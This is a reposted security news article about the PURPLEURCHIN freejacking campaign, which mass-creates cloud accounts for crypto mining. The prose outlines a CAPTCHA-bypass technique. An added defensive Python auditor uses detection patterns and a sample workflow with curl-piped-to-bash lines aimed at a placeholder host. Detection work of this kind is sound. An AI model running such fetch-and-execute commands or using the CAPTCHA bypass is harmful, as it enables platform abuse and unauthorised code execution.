    Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

    By Admincrypt | January 6, 2023


    Jan 06, 2023Ravie LakshmananCryptocurrency / GitHub

    A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN.

    The group “primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations,” Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said.

    PURPLEURCHIN first came to light in October 2022 when Sysdig disclosed that the adversary created as many as 30 GitHub accounts, 2,000 Heroku accounts, and 900 Buddy accounts to scale its operation.

    Now, according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, setting up a total of over 130,000 bogus accounts across Heroku, Togglebox, and GitHub.

    More than 22,000 GitHub accounts are estimated to have been created between September and November 2022: three in September, 1,652 in October, and 20,725 in November. A total of 100,723 unique Heroku accounts have also been identified.

    The cybersecurity company also termed the abuse of cloud resources a “play and run” tactic designed to avoid paying the platform vendor’s bill by making use of falsified or stolen credit cards to create premium accounts.

    Its analysis of 250GB of data dates the earliest sign of the crypto campaign to at least August 2019, nearly 3.5 years ago, and also uncovered the use of more than 40 wallets and seven different cryptocurrencies.

    The core idea that undergirds PURPLEURCHIN is the exploitation of computational resources allocated to free and premium accounts on cloud services in order to reap monetary profits on a massive scale before losing access for non-payment of dues.

    Besides automating the account creation process by leveraging legitimate tools like xdotool and ImageMagick, the threat actor has also been found to take advantage of a weakness in the CAPTCHA check on GitHub to further its illicit objectives.

    This is accomplished by using ImageMagick’s convert command to transform the CAPTCHA images to their RGB complements, followed by using the identify command to extract the skewness of the red channel and selecting the smallest value.

    Once the account creation is successful, Automated Libra proceeds to create a GitHub repository and deploys workflows that make it possible to launch external Bash scripts and containers for initiating the crypto mining functions.
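
    The workflow behaviour described above is something a platform or organization can audit for. The following is an added example, not code from the Unit 42 report or the original article: it scans GitHub Actions workflow text for steps that fetch and execute remote shell scripts or start containers. The regex rules and the sample workflow are constructed assumptions.

```python
import re
from typing import List, NamedTuple

class Finding(NamedTuple):
    line_no: int
    rule: str
    text: str

# Heuristic rules (illustrative assumptions, not indicators from the report).
SHELL = r"(?:ba|z|da)?sh"
FETCH = r"(?:curl|wget)"
RULES = {
    # curl/wget output piped straight into a shell
    "remote-script-pipe": re.compile(rf"\b{FETCH}\b[^|]*\|\s*(?:sudo\s+)?{SHELL}\b"),
    # bash <(curl ...) or sh -c "$(curl ...)"
    "remote-script-subst": re.compile(rf"\b{SHELL}\s+(?:<\(|-c\s+\W?\$\()\s*{FETCH}\b"),
    # a step that starts an arbitrary container on the runner
    "container-run": re.compile(r"\bdocker\s+run\b"),
}

def audit_workflow(text: str) -> List[Finding]:
    """Return one Finding per (line, rule) match, skipping blank and comment lines."""
    findings = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # commented-out commands never execute
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(no, rule, line))
    return findings

# Constructed sample workflow; example.invalid is a placeholder host.
SAMPLE_WORKFLOW = """\
name: build
on: [push]
jobs:
  job1:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: setup
        run: |
          # curl https://example.invalid/old.sh | bash
          curl -fsSL https://example.invalid/setup.sh | bash
      - run: docker run --rm example.invalid/worker:latest
      - run: bash <(wget -qO- https://example.invalid/b.sh)
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line_no}: {f.rule}: {f.text}")
```

    These patterns also match many legitimate build steps, so findings are best treated as review candidates and weighed together with account age and creation rate.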

    The findings illustrate how the freejacking campaign can be weaponized to maximize returns by increasing the number of accounts that can be created per minute on these platforms.

    “It is important to note that Automated Libra designs their infrastructure to make the most use out of CD/CI tools,” the researchers concluded.

    “This is getting easier to achieve over time, as the traditional VSPs are diversifying their service portfolios to include cloud-related services. The availability of these cloud-related services makes it easier for threat actors, because they don’t have to maintain infrastructure to deploy their applications.”
